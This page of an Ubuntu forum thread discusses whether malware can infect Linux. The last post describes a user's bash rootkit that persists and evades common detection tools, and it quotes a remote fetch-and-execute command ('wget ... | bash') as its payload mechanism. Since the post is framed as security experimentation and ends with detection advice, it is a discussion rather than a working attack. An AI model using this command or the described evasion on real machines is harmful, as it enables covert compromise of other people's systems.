Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17

Thread: Can Viruses/Malware affect ubuntu?

  1. #11
    Join Date
    Oct 2019
    Beans
    16
    Distro
    Ubuntu 19.10 Eoan Ermine

    Re: Can Viruses/Malware affect ubuntu?

    Although highly possible it is definitely less likely to happen than a Windows infection becaues most people use Windows and most hackers concentrate their efforts on screwing as many people as possible with less effort.In all the time I used Linux I never had an infection although nowadays with everything being web-based, you can visit a page with a trojan that could steal passwords or things you type on the browser I think.

  2. #12
    Join Date
    Jul 2005
    Location
    I think I'm here! Maybe?
    Beans
    Hidden!

    Re: Can Viruses/Malware affect ubuntu?

    Quote Originally Posted by zimbuf View Post
    I mean yes, but that's true with running a web browser in root as well, given GNOME ships with a JavaScript runtime environment. Pointing out WINE for vulnerabilities that aren't much different from Linux is just FUD
    Indeed it is true, but if you run a web-browser as root I am inclined to suggest that you almost deserve malware attacks!

    Web-browsers run as root is something that should NEVER EVER HAPPEN!!! Users that do so need to learn a lot more about computer security.

    D'ont do it!

    PS:
    I've been using Linux exclusively now for over 15 years without any malware or virus-checker, and never had any infections.
    DISTRO: Xubuntu 18.04-64bit --- Code-tags --- Boot-Repair --- Grub2 wiki & Grub2 Basics --- RootSudo --- Wireless-Info --- SolvedThreads

  3. #13
    Join Date
    Oct 2019
    Beans
    10

    Re: Can Viruses/Malware affect ubuntu?

    Quote Originally Posted by battlex10 View Post
    Can such rogue processes be detected/caught?
    Yes it's interesting how? There was some story when hackers were caught because of server's logs. Happens all the time, probably. How does a user read logs, which logs and what deserves attention in them.

  4. #14
    Join Date
    Feb 2010
    Location
    South of the Maple Trees
    Beans
    Hidden!
    Distro
    Xubuntu 18.04 Bionic Beaver

    Re: Can Viruses/Malware affect ubuntu?

    Quote Originally Posted by giant-paw View Post
    Yes it's interesting how? There was some story when hackers were caught because of server's logs. Happens all the time, probably. How does a user read logs, which logs and what deserves attention in them.
    That depends on the system's configurations.
    https://www.eurovps.com/blog/importa...be-monitoring/
    https://www.loggly.com/ultimate-guid...ng-linux-logs/

  5. #15
    Join Date
    Nov 2019
    Beans
    1

    Re: Can Viruses/Malware affect ubuntu?

    So, should I install AV at Ubuntu Server to prevent malware?

  6. #16
    Join Date
    Feb 2010
    Location
    South of the Maple Trees
    Beans
    Hidden!
    Distro
    Xubuntu 18.04 Bionic Beaver

    Re: Can Viruses/Malware affect ubuntu?

    Quote Originally Posted by situstarget View Post
    So, should I install AV at Ubuntu Server to prevent malware?
    What kind of server? I recommend reading the thread and the Security forums stickies. This one is great. bodhi.zazen did a nice job on it.

  7. #17
    Join Date
    Dec 2018
    Location
    Paris, France
    Beans
    11

    Re: Can Viruses/Malware affect ubuntu?

    Quote Originally Posted by battlex10 View Post
    Could a malware such as one made in python affect ubuntu or linux in any way by running a script in background which hijacks/installs backdoor or connects to a botnet without my knowledge?
    Can such rogue processes be detected/caught?
    I'd say yes. I'm working on a very simple "rootkit" (it works firstly under user privileges only, even though a rootkit supposedly works as root) written in bash (yes, in bash), working on desktop environments, for security experiments. Something written to target a particular user of your choice using any Ubuntu LTS variant (I didn't try on other variants). It has to be installed by the target (via social engineering or any tricks of this kind) or via an "evil maid" attack, unless you find any other way to get it automatically installed through an exploitable security flaw. It provides you to get a script of your own remotely executed at scheduled times (such as something like: wget -O - http://yourserver | bash).

    This simple 300 lines long program is, as far as I checked, persistent and not detectable through traditional means (ps, crontab, rkhunter, chkrootkit, clamav, most of unhide stuff, and most of the network analyzers, as long as you have an exhaustive list of those which can be running on the system). I tried to make it light enough to keep it from being significantly detected via the CPU load and it hides in the hidden directories of the user's /home/.

    All that to say that whether you got infected by a simple malware like that or an advanced one (using preloaded libraries, loadable kernel modules or patched kernel rootkit, which need root to get installed), the methods of detection would be a bit different / almost the same, but the best way to be sure something wrong is happening before breaking up your system to find the culprit would be to tap your network "outside of the box", where nothing could be hidden by any malicious stuff.
    Last edited by pending...; 1 Week Ago at 03:22 PM.

Page 2 of 2 FirstFirst 12

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •